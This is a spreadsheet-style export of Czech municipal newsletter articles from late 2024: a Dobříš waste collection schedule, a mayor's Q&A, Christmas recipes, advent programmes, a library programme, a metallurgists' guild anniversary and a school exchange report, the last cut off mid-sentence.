    <t>Harmonogram svozu odpadu 2025 – rodinné domy DŮLEŽITÉ INFORMACE Harmonogram pro bytové domy naleznete na stránkách města nebo ve svém odpadovém účtu. Harmonogram svozu odpadu od rodinných a bytových domů je i v roce 2025 rozdělen podle jednotlivých lokalit. Popelnice se směsným odpadem se sváží dle lokalit v pondělí a v pátek vždy v lichém týdnu. Tříděný odpad z celého města bude i v roce 2025 svážen vždy ve čtvrtek. Papír od rodinných domů v intervalu 1× za měsíc (modré políčko), plast v intervalu 1× za 14 dní (žluté políčko). U bytových domů je svoz papíru posílen též na interval 1× za 14 dní, plast v intervalu 1× za 14 dní, 1100l kontejnery na směsný odpad každé pondělí. ! DŮLEŽITÉ: Nádoby/pytle přistavujte ke svozu vždy den předem nejlépe ve večerních hodinách. Popeláři jezdí od brzkých ranních hodin. Umístění domu, tj. lokalita určuje, který den v lichém týdnu (po, nebo pá) se sváží popelnice se směsným komunálním odpadem. Seznam lokalit zůstává pro rok 2025 zachován a naleznete jej na stránkách města (v sekci odpady MESOH). V případě nejasností se lze obrátit na níže uvedené kontakty. Na Dobříši je zaveden tzv. MULTIKOMODITNÍ sběr tříděného odpadu. Vedle plastových obalů vhazujete do nádob/pytlů i nápojové kartony (např. od džusů nebo mléka) a kovové obaly (např. konzervy nebo plechovky od piva ). Vždy plné TRANSPARENTNÍ pytle s vytříděným plastovým odpadem označené visačkou s čárovým kódem nebo nádoby označené QR kódem přistavte večer před svozovým dnem před dům blízko silnice nebo na určené/domluvené místo. Svoz tříděného odpadu od domu probíhá vždy od 3.30 do cca 15.00 hod. Tříděný odpad lze dále odevzdávat na sběrném dvoře, kde vám budou čárové kódy také načteny. Vážení občané, žádáme vás, abyste v případě deště nedávali ke svozu balíky s papírem bez krytí. Promočený papír se stává směsným odpadem a není již možné jeho další využití. ! REKLAMACE Nesvezené nádoby prosím reklamujte u společnosti DOKAS v den svozu nebo následující den na tel. 731 495 465 nebo 739 530 940. DOTAZY, MESOH, PYTLE, ŠTÍTKY, QR KÓDY V případě dotazů na MESOH, zajištění svozu odpadu, vyzvednutí pytlů aj. kontaktujte p. Rambouskovou na tel. 318 533 384 nebo na e-mailu rambouskova@seznam.cz. Budova MěÚ B (nad Penny Marketem ), 2. patro. POPLATEK ZA ODPADY V případě dotazů na výši a úhradu poplatku za odpady kontaktujte finanční odbor na tel. 318 533 390. Budova úřadu A (radnice), přízemí, místní poplatek. Občané města Dobříše si mohou u společnosti DOKAS objednat také odvoz velkoobjemového odpadu od domu. Tato služba je již ale plně hrazena samotným občanem. 2025 P Ú S Č P S N týden 30 31 1 2 3 4 5 1 6 7 8 9 10 11 12 2 13 14 15 16 17 18 19 3 20 21 22 23 24 25 26 4 27 28 29 30 31 5 1 2 5 3 4 5 6 7 8 9 6 10 11 12 13 14 15 16 7 17 18 19 20 21 22 23 8 24 25 26 27 28 9 1 2 9 3 4 5 6 7 8 9 10 10 11 12 13 14 15 16 11 17 18 19 20 21 22 23 12 24 25 26 27 28 29 30 13 PROSINEC LISTOPAD ŘÍJEN ZÁŘÍ SRPEN ČERVENEC ČERVEN KVĚTEN DUBEN BŘEZEN ÚNOR LEDEN 31 14 1 2 3 4 5 6 14 7 8 9 10 11 12 13 15 14 15 16 17 18 19 20 16 21 22 23 24 25 26 27 17 28 29 30 18 1 2 3 4 18 5 6 7 8 9 10 11 19 12 13 14 15 16 17 18 20 19 20 21 22 23 24 25 21 26 27 28 29 30 31 22 1 22 2 3 4 5 6 7 8 23 9 10 11 12 13 14 15 24 16 17 18 19 20 21 22 25 23 24 25 26 27 28 29 26 30 27 1 2 3 4 5 6 27 7 8 9 10 11 12 13 28 14 15 16 17 18 19 20 29 21 22 23 24 25 26 27 30 28 29 30 31 31 1 2 3 31 4 5 6 7 8 9 10 32 11 12 13 14 15 16 17 33 18 19 20 21 22 23 24 34 25 26 27 28 29 30 31 35 1 2 3 4 5 6 7 36 8 9 10 11 12 13 14 37 15 16 17 18 19 20 21 38 22 23 24 25 26 27 28 39 29 30 40 1 2 3 4 5 40 6 7 8 9 10 11 12 41 13 14 15 16 17 18 19 42 20 21 22 23 24 25 26 43 27 28 29 30 31 44 1 2 44 3 4 5 6 7 8 9 45 10 11 12 13 14 15 16 46 17 18 19 20 21 22 23 47 24 25 26 27 28 29 30 48 1 2 3 4 5 6 7 49 8 9 10 11 12 13 14 50 15 16 17 18 19 20 21 51 22 23 24 25 26 27 28 52 29 30 31 1 Komunální odpad PO a PÁ v liché týdny dle lokalit jako doposud Plast + nápojový kartón + kov ČT v sudé týdny celá Dobříš Papír ČT dle kalendáře celá Dobříš Rozpis lokalit pro svoz SKO naleznete na stránkách města v sekci MESOH odpady</t>
  </si>
  <si>
    <t>20241201_349_3473474166_304c16361708adbe6bb4.html</t>
  </si>
  <si>
    <t>304c16361708adbe6bb4</t>
  </si>
  <si>
    <t>ZEPTALI JSTE SE STAROSTY</t>
  </si>
  <si>
    <t>ZEPTALI JSTE SE STAROSTY Neuvažuje město o městském ohňostroji na Silvestra? Kdysi dávno se to tak dělávalo… P. N. Je to již spoustu let, kdy město Valašské Klobouky organizovalo na Silvestra ohňostroj. Ještě pár let zpátky byl velký ohňostroj při akci Setkání muzikantů v Bílých Karpatech , ale od té doby město od pořádání velkých ohňostrojů upustilo. Důvodů je více, největším finanční náročnost, ale také zajištění bezpečnosti nebo poměrně negativní dopad na životní prostředí (například na zvířata). S pořádáním velkého silvestrovského nebo novoročního ohňostroje nepočítáme tedy ani nyní. Přesto na Nový rok ohňostroj na náměstí uvidíte. Během akce Novoroční prskání uděláme před budovou radnice malý dětský ohňostroj, který by měl potěšit zvláště rodiny s dětmi. Všichni jste srdečně zváni! Dřevěné zastávky, které jsou v Brumovské ulici nebo třeba v Mirošově , jsou strašné. Hnijí, teče tam, smrdí to tam a mládež tam chodí kouřit nebo popíjet alkohol . Nechcete je vyměnit za podobné, které jsou na Cyrilometodějské ulici pod poliklinikou? J. F. Souhlasím s vámi, že dřevěné zastávky už nevyhovují. Každý rok nás stojí spoustu peněz jejich udržování a opravy dřevěných částí, hlavně střechy. Proto jsme se rozhodli, že je začneme postupně vyměňovat za nové, které budou podobné té, jež je pod poliklinikou u hlavní cesty. První realizace probíhá letos ve Smolině, příští rok chceme vyměnit Mirošov a následně se přesuneme do Valašských Klobouk na Brumovskou ulici. Autor: Josef Bělaška, starosta Autor person Josef Bělaška</t>
  </si>
  <si>
    <t>20241201_35_3478693188_d0d35e41397df1db1149.html</t>
  </si>
  <si>
    <t>d0d35e41397df1db1149</t>
  </si>
  <si>
    <t>První Říčanské HUSO-VÍNO-BRANÍ</t>
  </si>
  <si>
    <t>První Říčanské HUSO-VÍNO-BRANÍ V listopadu jsme pro vás připravili novinku – Říčanské HUSO-VÍNO-BRANÍ. Společně jsme si užili dobré jídlo, víno a spoustu zábavy. Velké díky patří všem, kteří se na akci podíleli: Jezdeckému klubu Říčany a Kristýně Pánkové za poskytnutí koně pro sv. Martina, panu Václavovi z Říčan , Odboru správy a údržby města, Sboru dobrovolných hasičů, Městské policii, Pekařství Frydrych za svatomartinské rohlíčky, SSŘ Kunice a Drobečkoff – coworking s možností hlídání, za přípravu dílniček a soutěží. A také skvělým vinařům a restauracím, kteří do toho šli s námi. Foto: Rudolf Flachs E-mail příjemce: E-mail odesílatele: Vzkaz (odkaz na tuto stránku bude připojen automaticky): Jméno a příjmení: E-mail (nebude zveřejněn, slouží pouze k autorizaci)*: Text**: *Autorizace příspěvku: Zadejte prosím funkční e-mailovou adresu. Pokud na těchto stránkách přispíváte poprvé, bude na tuto emailovou adresu odeslána žádost o autorizaci příspěvku (ve zprávě najdete odkaz, pomocí kterého potvrdíte autorizaci). Nejsou vyžadovány žádné další osobní údaje pisatele, autorizace slouží pouze k zamezení zjevně anonymních příspěvků. Pokud nedojde k autorizaci do 60 minut po odeslání příspěvku, je příspěvek znepřístupněn. Pokud provedete autorizaci později, je příspěvek opět zpřístupněn. Autorizace probíhá pouze jednou, při prvním použití emailové adresy. **Zápis textu: Pište prosím pouze čistý text. Nezapisujte HTML značky, při ukládání budou odstraněny. Pokud chcete vložit odkaz na adresu v internetu, uzavřete ji do složených závorek: {www.adresa.cz} - takto zapsaná adresa bude převedena na hypertextový odkaz.</t>
  </si>
  <si>
    <t>241</t>
  </si>
  <si>
    <t>65</t>
  </si>
  <si>
    <t>20241201_350_3473480068_aa5c13edaf4e25fbbe8f.html</t>
  </si>
  <si>
    <t>aa5c13edaf4e25fbbe8f</t>
  </si>
  <si>
    <t>Pečeme s Hranickým zpravodajem</t>
  </si>
  <si>
    <t>Pečeme s Hranickým zpravodajem Milí čtenáři, moc vám děkujeme, že jste se s námi podělili o vaše recepty na vánoční cukroví. Poslali jste nám recepty na vanilkové rohlíčky, linecké cukroví, vánočky i perníčky. Věřím, že jsou všechny úžasné a že každý kousek bude chutnat výborně. Vybrali jsme dva nejzajímavější recepty a doufám, že zaujmou i vás. A abychom se přes svátky necpali jen sladkým, přikládám dva nesladké, ale zaručeně odzkoušené recepty, a to na utopence v černém pivu a nakládaný hermelín. Obě dobroty jsou každoročně už několik let nedílnou součástí vánočních svátků v naší rodině. Vloni jsem je poprvé odzkoušela i jako vánoční dárky pro mé nejbližší (pravda, u mužské části) a měly obrovský úspěch! Navíc je to rychlovka a uvidíte, jak přijdou k chuti 😉. Tak šťastně a vesele! Vánočka Těsto: 3 hrnky polohrubé mouky 1 lžička hladké mouky 5 lžic pískového cukru 1 / kostky másla 3 ¾ kostky droždí ½–¾ hrnku mléka 1 žloutek sůl 1 balíček vanilkového cukru 1 lžička nastrouhané kůry z dobře omytého citronu špetka nastrouhaného muškátového oříšku ½ hvězdičky tlučeného badyánu 3 lžíce dobře omytých a okapaných rozinek 4 lžíce oloupaných a nakrájených mandlí hladká mouka na posypání válu, tuk na potření pečicího papíru, vejce na potření vánočky Postup: Do vlažného mléka rozdrobíme droždí, přidáme 1 lžíci cukru, zaprášíme 1 lžičkou hladké mouky a necháme vzejít kvásek. K osolené polohrubé mouce přidáme zbylý cukr, vanilkový cukr, citronovou kůru, muškátový oříšek, badyán, žloutek, vlahé rozpuštěné máslo a vykynutý kvásek. Vše dobře zpracujeme vařečkou. Když se těsto nelepí ke stěnám mísy, vyklopíme je na pomoučený vál a rukama dobře prohněteme, až je hladké a lesklé. Poté do něj zapracujeme rozinky a polovinu mandlí. Utvoříme bochánek, vložíme jej do mísy, poprášíme moukou, přikryjeme utěrkou a necháme na teplém místě vykynout. Vykynuté těsto rozdělíme na devět dílů a vyválíme z nich stejně silné prameny. Ze čtyř pramenů upleteme spodní díl vánočky a přeneseme jej na pečicí papír potřený tukem, který jsme položili na plech. Střed mírně prohloubíme hřbetem ruky s nataženými prsty a potřeme rozšlehaným vejcem. Do prohlubně vložíme další vrstvu upletenou ze tří pramenů. Mírně ji přitiskneme ke spodnímu dílu a střed po délce opět mírně prohloubíme a potřeme rozšlehaným vejcem. Poslední dva prameny stočíme jeden kolem druhého, položíme je na předchozí vrstvu, mírně přitiskneme a oba konce podsuneme pod vánočku. Abychom zabránili sesunutí těsta, vpíchneme do středu a obou konců vánočky špejle. Vánočku necháme na plechu vykynout, poté ji potřeme rozšlehaným vejcem a posypeme zbylými mandlemi. Vložíme do horké trouby a asi 5 minut zapečeme. Teplotu zmírníme a vánočku zvolna pečeme 45 až 50 minut. Když má vánočka zlatavý povrch, do nejvyšší části těsta vpíchneme špejli. Zůstaneli po vyjmutí suchá, je vánočka dostatečně propečená. Upečenu vánočku necháme vychladnout na prkýnku. Medovníčkové koule Těsto: 500 g hladké mouky 2 vejce 2 čajové lžičky jedlé sody 60 g rozpuštěného másla 4 polévkové lžíce medu a 200 g moučkového cukru nebo 9 lžic medu a žádný cukr Krém: 1 karamelové kondenzované mléko 1 máslo Postup: Z těsta uděláme beztvaré placky a upečeme na 180 stupňů dozlatova a necháme vychladnout. Mezitím si uděláme krém ze změklého másla a kondenzovaného mléka. Zchladlé placky rozdrtíme na jemné drobečky – nejlepší je placky nalámat a rozmixovat v mixéru. Trochu drobečků si odložíme stranou na obalení kuliček. V míse si smícháme krém s rozdrobenými plackami a vypracujeme hmotu, kterou dáme na dvě hodiny do lednice. Pak vytáhneme těsto z lednice a už jen vytvarujeme kuličky, které obalujeme v drobečcích. Utopenci v černém pivě na 5litrovou sklenici 8 až 10 špekáčků cca do 3/4 kg cibule (jak má kdo rád) Nálev: 1 litr octa 2× 0,5 l černého piva 1 polévkovou lžíci soli 1 lžičku grilovacího koření 8 kuliček nového koření 16 kuliček celého černého pepře 2 bobkové listy cca 10 dkg plnotučné hořčice špetka tymiánu, zázvor, může být i sušený Postup: Všechno povaříme asi 15 minut a necháme vychladnout. Mezi tím si rozpůlíme špekáčky a cibuli nakrájíme na půlkolečka. Do vymyté a vysušené pětilitrovky skládáme na patra cibuli/ špekáčky. My máme rádi ostré, takže do sklenice přidáváme ještě dvě až tři malé sušené chilli papričky. Vše zalijeme vychladlým nálevem. Uzavřeme a necháme aspoň 3 týdny uležet na balkoně nebo jiném chladnějším místě. Nakládaný hermelín na 0,7litrovou sklenici 3 hermelíny/camemberty olej červená cibule 5–8 kuliček celého černého pepře 3–5 kuliček nového koření menší bobkový list červená mletá paprika sušený česnek Postup: Hermelíny podélně rozpůlíme, z česneku a červené papriky s trochou oleje umícháme kašičku, kterou potřeme rozpůlené hermelíny a poté je spojíme. Červenou cibuli si nakrájíme na kolečka a začneme skládat do sklenice – hermelín a cibuli, mezi to přidáme černý pepř, nové koření, bobkový list, můžeme přihodit i chilli papričku a vše pak zalijeme olejem. Zavřeme a dáme uležet do ledničky nebo na chladné místo na 10 až 14 dní. I tady platí pravidlo: čím déle, tím lépe. Autor: Liba Mátlová Autor person Liba Mátlová</t>
  </si>
  <si>
    <t>8400</t>
  </si>
  <si>
    <t>20241201_351_3473483186_2764cac0f5191d77f894.html</t>
  </si>
  <si>
    <t>2764cac0f5191d77f894</t>
  </si>
  <si>
    <t>Po deseti letech se vrací adventní ohňostroj</t>
  </si>
  <si>
    <t>Po deseti letech se vrací adventní ohňostroj Rubrika: HLAVNÍ TÉMA Příbramský advent se v tomto roce ponese opět v duchu tří adventních zastavení a jednoho výjezdu vánočního kočáru. Po 10 letech bude součástí zahájení adventu ohňostroj. Zahájení adventu v letošním roce vychází na 1. prosince. Součástí první adventní neděle bude pódiový program, adventní trhy, tvůrčí dílničky, rozsvícení vánočního stromu a také ohňostroj z budovy Úřadu práce. Na pódiu se opět představí „lokální“ sbory – Chlapecký pěvecký sbor, Písnička a Canzonetta a Hudební seskupení ZUŠ Příbram a Pěvecký sbor Hokus Pokus. Dalšími vystupujícími budou americký jazzový zpěvák Lee A. Davison a folková kapela Kantoři, která se bude prezentovat adventními skladbami. Součástí druhé poloviny zahájení adventu bude žehnání adventnímu věnci, rozsvícení vánočního stromu a také ohňostroj, který bude spíše vizuálně laděný. Vyslyšeli jsme hlas veřejnosti, který několik let volá po ná vratu k ohňostroji. Zároveň však víme, že mohou trpět zvířata, a proto ve spolupráci s Úřadem práce uspořádáme sbírku pro Psí útulek v Lazci. Lidé mohou během první adventní neděle nosit na náměstí T. G. Masaryka granule či jiné pochoutky, které následně předáme. Od 1. prosince budou na obou příbramských náměstích umístěny dřevěné stánky, které budou otevřeny až do 6. ledna 2025. Součástí MHD v Příbrami bude již třetím rokem tzv. Adventní autobus, který je velmi oblíbený hlavně u nejmenších. V den zahájení adventu bude navíc jezdit MHD zdarma. Důležitým bodem zahájení je také uzavření Milínské ulice od kruhového objezdu do sjezdu do Špitálské ulice, a to od 15.00 do 20.00. V neděli 1. prosince doporučujeme odstavit auto v parkovacím domě nebo využít MHD zdarma. Uvedený program připravuje Městské kulturní centrum Příbram. Program na návštěvníky však v tento i další dny čeká např v Knihovně Jana Drdy. Při zahájení to bude Den pro knihu. O týden později se adventní atmosféra a vůně svařeného vína přesune na Březové Hory . Zde na pódiu vystoupí pěvecké sbory ZŠ Březové Hory , Jiráskáček a Sbor MŠ pod Svatou Horou . Doplní je pak koncert kapely Malibu a skupin Bacha Baby a Rebelky. Na Březových Horách můžete 8. prosince navštívit také Hornické muzeum Příbram , kde se uskuteční koncert Arytmie a Gambale. Stříbrná neděle se bude 15. prosince odehrávat na náměstí 17. listopadu. Opět nebudou chybět adventní trhy a pódium, kde vystoupí sbory Dušnická sedma a Dušnický sboreček, pěvecký sbor ZUŠ Antonína Dvořáka HasArt, dále Poutníci a závěr bude patřit Jaromíru Adamcovi a jeho Poctě velkým hlasům. Poslední adventní neděle bude ve znamení průjezdu vánočního kočáru městem. Zastavení bude mít tentokrát v Domě seniorů na Březových Horách a dále na náměstích J. A. Alise, 17. listopadu a T. G. Masaryka . Adventní program samozřejmě chystají i další kulturní organizace – Divadlo A. Dvořáka Příbram , Svatá Hora , Knihovna Jana Drdy nebo Hornické muzeum Příbram . Autor: S Vlastimil Ševr Městské kulturní centrum Příbram Autor person Vlastimil Ševr Městské Rubrika transition_slide HLAVNÍ TÉMA</t>
  </si>
  <si>
    <t>15900</t>
  </si>
  <si>
    <t>20241201_352_3473463817_07f1ba9b9cf28466fd03.html</t>
  </si>
  <si>
    <t>07f1ba9b9cf28466fd03</t>
  </si>
  <si>
    <t>Prosinec v Berouně</t>
  </si>
  <si>
    <t>20241201_353_3473473988_6405032dee0493c6aa08.html</t>
  </si>
  <si>
    <t>6405032dee0493c6aa08</t>
  </si>
  <si>
    <t>MĚSTSKÁ KNIHOVNA DOBŘÍŠ</t>
  </si>
  <si>
    <t>MĚSTSKÁ KNIHOVNA DOBŘÍŠ Programy Knihomrně, Výtvarná dílna s Jíťou, Malá dobříšská univerzita, kurzy angličtiny, Magic the Gathering a Lovci perel jsou podpořeny z grantu MPSV „Obec přátelská rodině a seniorům 2024“. PROSINEC KNIHOMRNĚ Pro děti 0–3: rytmy, říkanky, písničky, pohádka, pohyb. Jednou měsíčně, vstup volný. Ozvěte se nám (moje@knihovnadobris.cz , 777 299 044), nabídneme vám místo ve skupině. Pondělí 2. 12. od 10.00 CHVÍLE PRO POHÁDKU: PŘÍBĚHY Z VÁNOČNÍ KAPSY V magickém čase Vánoc se může stát ledacos... Dětské vánoční příběhy Františka Nepila či Zbyňka Malinského doporučujeme pro děti od 4 do 10 let. Vstup volný. Středa 11. 12. od 17.00 VÁNOCE A KNIHOVNA: 24. 12. – 2. 1. zavřeno V pátek 20. 12. přijďte na hrneček svařeného vína . V pondělí 23. 12. je knihovna otevřena naposled před svátky. V pátek 3. 1. knihovnu opět otvíráme pro veřejnost. VÝTVARNÁ DÍLNA S JÍŤOU: SNĚHULÁČEK NA STROMEČEK Kdo ví, kdy napadne dost sněhu – zatím si pro jistotu vyrobte sněhuláka u nás! Vstup volný, materiál zdarma. Pondělí 2. 12. od 12 do 17 hodin VÝTVARNÁ DÍLNA S JÍŤOU: ZASNĚŽENÉ TĚŽÍTKO Tohle těžítko bude klenot vaší domácnosti! A jak je praktické! Vstup volný, materiál zdarma. Pondělí 6. 1. od 12 do 17 hodin DÁLE ZVEME NA: LOVCI PEREL – soutěž MAGIC THE GATHERING v pondělí CVIČENÍ NA ŽIDLI v pondělí DESKOHRANÍ v úterý JÓGA S DÁŠOU ve středu ŠACHOVÝ KROUŽEK ve čtvrtek ČEŠTINA PRO CIZINCE zdarma – v pátek MDU: Jakub Greschl – S KUBOU NA KUBĚ Krásná příroda, mogoty, tabákové plantáže, koloniální města, stará Havana , farmy s tabákem a cukrovou třtinou, doutníky... Vstupné 70 Kč; káva/čaj v ceně. PONDĚLÍ 2. 12. od 18.00 Soňa Wojnarová : NA SEVER! – výstava Velké, krásné, barevné! Švédsko – Norsko – Finsko . A maličko literatury k tomu... Fotografie je možné zakoupit za opravdu velmi přátelské ceny! 1. 12. 2024 – 28. 2. 2025 KOUPÍTE U NÁS: Dárkový balíček MěK Dobříš : průkazka do knihovny, vstup na jednu akci knihovny dle vlastního výběru a malý dáreček. Cena 80 / 150 / 220 Kč. Vstupenky do příbramského divadla a kina www.knihovnadobris.cz KNIHOVNA 2024 V letošním roce jsme oslavili 160. výročí založení dobříšské knihovny, a to samozřejmě s našimi čtenáři; nabídli jsme jim týden výjimečných programů i malé dárečky. Jsme rádi, že zatímco knihovny stále hlásí odliv čtenářů, u nás i letos zájem stát se uživatelem knihovny mírně stoupl – k půlce listopadu máme registrováno 2 647 aktivních čtenářů, tedy o 74 více než loni. Stejně tak se u nás nezměnil podíl dětí do 15 let z celkového počtu čtenářů; je to téměř polovina. Kromě toho pravidelně pořádáme besedy pro třídy mateřských i základních škol a ty nejaktivnější třídy si k nám chodí pravidelně půjčovat knihy v rámci hodin českého jazyka – což je asi nejlepší možná podpora toho, aby se děti učily číst s láskou i s porozuměním a aby posléze byly schopné dobře studovat. Dětem i dospělým nabízíme kvalitní, pravidelně obnovovaný knižní fond – zhruba 40 tisíc svazků a jiných nosičů. Kromě běžných knih máme e-knihy, téměř třináct stovek komiksů, denní tisk, desítky titulů časopisů, zhruba čtyři a půl tisíce audioknih a e-audioknih, desítky pěkných vinylů (tedy LP gramofonových desek) a mnoho deskových her. Také pořádáme mnoho programů pro všechny věkové kategorie od dětí od půl roku výše po seniory. Vyzvedněte si novoročenku s podrobným kalendářem našich programů na rok 2025 zdarma na výpůjčních pultech v obou odděleních knihovny! KNIHOVNA 2025 Dobříšská společnost stárne a vzrůstá potřeba kvalitních programů pro seniory. A právě na to bychom se v příštím roce chtěli zaměřit. Chystáme se zopakovat úspěšné programy Plstění, Trénování paměti, Arteterapie, Tábor pro starší a pokročilé, pokračovat budou samozřejmě i kurzy angličtiny a počítačové poradenství. V oddělení pro děti otevřeme nové čtenářské hnízdo a také se chystáme výrazně rozšířit naši semínkovnu – nyní k nám budete moci nosit (nebo si naopak odnášet) i malé sazeničky. Milí čtenáři, přejeme vám o adventu, o svátcích i v novém roce klidnou a veselou mysl a spoustu krásných a zajímavých knih – nejen těch klidných a veselých! Romana Nováková</t>
  </si>
  <si>
    <t>20241201_354_3473472685_d2eb508f73c705c3a729.html</t>
  </si>
  <si>
    <t>d2eb508f73c705c3a729</t>
  </si>
  <si>
    <t>Cech příbramských hutníků olovářů slaví půlstoletí své existence</t>
  </si>
  <si>
    <t>Cech příbramských hutníků olovářů slaví půlstoletí své existence Před 50 lety na svém prvním zasedání v hospůdce Za Komínem v Novém Podlesí bylo „údery cechmistrovského práva“ zahájeno první zasedání, jímž byl založen Cech příbramských hutníků olovářů. Stalo se tak 27. prosince 1974. Úvodního zasedání Cechu příbramských hutníků olovářů se zúčastnilo celkem 22 hutníků příbramské šmelcovny (hutě, tedy Kovohutí Příbram ) včetně dvou žen, které byly na počátku zasedání pro pořádek povýšeny na muže, všichni byli poté po dvou letech„zkušební tovaryšské doby“ jmenováni cechovními mistry. Záměrem založení cechu bylo zejména: Utužování vztahů vkolektivu hutníků ahorníků; Připomínání hutnických ahornických tradic; Udržování hutnických památek. Prvním Slavným, vysokým a neomylným cechmistrem (tedy představeným cechu, SVNC) byl téměř jednomyslně zvolen Miloslav Matějka , který 12 let cech řídil neopakovatelným způsobem, než cechmistrovství předal další velké osobnosti příbramské hutě – Jaroslavu Daňhelovi . Od počátku byl cech postupně vybavován insigniemi. Cechovní mistři časem dostali cechovní medaili, hutnickou švancaru (jejíž návrh zhotovil Jan Čáka ), bílý hutnický klobouk a následně uniformu v barvách černé a červené, znázorňující rudu a oheň. Nezbytnou rekvizitou je cechovní prapor, který je v čele cechu nošen při slavnostních příležitostech. NÁPOJ CECHOVNÍ A NÁPOJ ZVYKOVÝ Cechovní sese (oficiální zasedání) se konaly vždy v hospůdkách v blízkém okolí, po dobrém jídle se cechovní mistři posilují nápojem cechovním ( pivem ) a do roku 1983 nápojem zvykovým (rumem). Pro neblahé důsledky bylo však následně od povinnosti konzumace nápoje zvykového upuštěno. Cech se od počátku schází obvykle dvakrát ročně na sesích, které se řídí pevně nastavenými pravidly. Hlavní z nich je absolutní pravda SVNC, jemuž nikdo odporovat nemůže, jinak se na sesi se zlou potáže. Cechovní pokladnu hlídá strážce pokladu a zápisy ze zasedání cechu provádí cechovní písař. Dvě cechovní kroniky dokumentují 50 let činnosti cechu. Kromě těchto oficiálních funkcí byl v historii cechu určen ke zjednávání pořádku cechovní kat vybavený důtkami, jimiž trestal nejméně ukázněné cechovní mistry. Další některá jmenování došla časem k zapomenutí. Citujme např. zápis z jednání cechu v roce 1983: „Pravé kontrarium ředitel podniku ve svém tradičním zahajovacím projevu hovoří o práci členů cechu, zdůrazňuje, že úkoly za 1. pololetí roku byly splněny na 53 % a že se nám mimořádně daří v ekonomické oblasti, že se snižuje výroba a zvyšuje se finanční efekt. Vyzdvihuje za to CM Prokopa, který umně manipuluje s ekonomickými nástroji a ukazateli, přičemž mu zdárně protékají ekonomické výsledky skrz prsty. Ve zvládnutí těchto žonglérských praktik mu pomáhá cechmistr (CM) Sýkora, který je nejvýš povolaný v tomto směru, protože úspěšně ukončil Vysokou školu pro lapky (ekonomickou) a získal v tomto oboru titul inženýra (potlesk). Oba pak, jak CM Prokop, tak CM Sýkora, se vhodně doplňují, vyvolávají tajemné účinky nadpřirozených sil a překonávají tak všechny ekonomické zákony a teorie. Obdivuhodně kloubí teorii a praxi a uplatňují svůj vynikající zlepšovací návrh: jak snižovat výrobu a zvyšovat výnosy... (Bouřlivý potlesk). Pravé kontrarium dále hovoří, že je nutno oba vyhodnotit, pochválit a odměnit. CM Prokop a Sýkora jsou pak SVNC odměněni mimořádně a na ex a povoluje se jim užívat a honosit se titulem: Cechovní šamani (Ovace) (poznámka redakce – šamani ve své prvopodstatě jsou mongolští kněží, kouzelníci, věštci, nositelé nadpřirozené magické moci a vyvolenci se schopností prostředníků mezi bohy a lidmi. Funkci šamanů převzali pak od Sibiřských etnik indiáni. Viz odborná literatura).“ EVROPSKÝ DEN HORNÍKŮ A HUTNÍKŮ 2026 V PŘÍBRAMI Cech příbramských hutníků olovářů spolupracuje zejména s Cechem příbramských horníků a hutníků a hornickými a hutnickými spolky České republiky . Hutníky s typickými klobouky za hutnickým praporem je možno vidět na Prokopských poutích, Setkáních hornických měst ČR (která v letech 1997, 2006 a 2016 pořádala Příbram stejně jako zřejmě příští v roce 2026) či Evropských dnech horníků a hutníků v zahraničních významných hornických či hutnických městech. Tato významná událost byla uspořádána v Příbrami v roce 2016, příští toto velké setkání horníků a hutníků v roce 2026 v Příbrami se připravuje. Slavnou hornickou a hutnickou minulost Příbrami připomíná památník, který v místě nejstarší známé stříbrné hutě na Příbramsku slavnostně odhalily Kovohutě spolu s cechem dne 21. dubna 2011, v den 700. výročí zhotovení nejstaršího písemného dokumentu o příbramské huti. Historii hutě pak dokumentuje hutnické muzeum v příbramských Kovohutích . Cech příbramských hutníků olovářů má nyní 26 členů – cechovních mistrů a jednoho tovaryše, tedy čekatele na členství v cechu. Padesáté výročí od založení cechu oslaví na výroční sesi dne 13. prosince. Cech příbramských hutníků olovářů v roce 2016. Foto (2×): CPHO Cech na Prokopské pouti Autor: Zdeněk Kunický Cech příbramských hutníků olovářů Autor person Zdeněk Kunický Cech</t>
  </si>
  <si>
    <t>20241201_355_3473472242_82aa5def5adf5d72d355.html</t>
  </si>
  <si>
    <t>82aa5def5adf5d72d355</t>
  </si>
  <si>
    <t>Návštěva partnerské školy z Freibergu: týden plný zážitků a spolupráce</t>
  </si>
  <si>
    <t>Návštěva partnerské školy z Freibergu : týden plný zážitků a spolupráce Rubrika: ŠKOLSTVÍ V září naše škola přivítala německé partnery z Freibergu v rámci každoročního výměnného programu. Během čtyř dnů si čeští a němečtí studenti sdíleli kulturní zážitky, ale také posílili svá přátelství. Program byl nabitý mnoha aktivitami. Od 24. do 27. září měla naše škola tu čest přivítat své německé partnery z Freibergu , kteří nás navštívili v rámci každoročního výměnného programu. Program začal již v úterý, kdy po příjezdu německých žáků a jejich učitelů proběhlo srdečné přivítání ředitelkou Klárou Karlíkovou. Následovala prohlídka školy, během které si žáci z obou zemí mohli lépe porozumět a seznámit se s prostředím, kde jejich čeští přátelé studují. Po společném obědě se všichni vydali na procházku po městě Příbrami , která byla obohacena o různé úkoly. Procházka byla zakončena na Svaté Hoře, kde si za své úsilí všichni zasloužili sladkou odměnu v podobě tradičních svatohorských oplatek. Večer se žáci vrátili do školy, kde na ně čekal seznamovací program plný her a aktivit, které přispěly k upevnění nově navázaných přátelství. Ve středu byla na programu celodenní návštěva Plzně . První zastávkou bylo kulturní centrum Depo2015, kde si všichni společně zahráli stopovací hru. Odpoledne se celá skupina vydala na komentovanou prohlídku pivovaru Plzeňský Prazdroj, kde se žáci dozvěděli mnoho zajímavých informací o výrobě piva . Večer pak žáci absolvovali únikovou hru, kterou s nadšením připravili učitelé naší školy. Čtvrtek byl věnován společné výuce, která probíhala formou tří workshopů. V rámci českého jazyka se němečtí žáci zábavnou formou naučili základní české fráze. Ve výtvarné výchově pak všichni společně tvořili animaci na téma partnerství mezi školami z Příbrami a Freibergu . Chemie přinesla další zajímavé zážitky – žáci psali a kreslili neviditelným písmem a tvořili duhu v odměrných válcích. Odpoledne strávili všichni na Novém rybníku, kde plnili různé sportovní disciplíny. Večer se pak v zimní zahradě školy konala slavnostní rautová večeře, po níž následovala volná zábava. Páteční rozloučení bylo plné emocí. Němečtí žáci se rozloučili s naší školou i s Příbramí , ale před odjezdem do Freibergu je čekala ještě poslední zastávka v Praze . Společně s českými žáky se zúčastnili interaktivní hry na Karlově mostě a na Kampě , což byla skvělá tečka za tímto nezapomenutelným týdnem. Nakonec už zbývalo jen zamávat freiberským studentům a odjet domů. Celý týden proběhl ve velmi přátelské atmosféře a všichni se již těšíme na příští rok, kdy navštívíme naše německé přátele ve Freibergu . Toto vše by nebylo možné bez nemalé podpory města Příbram , které 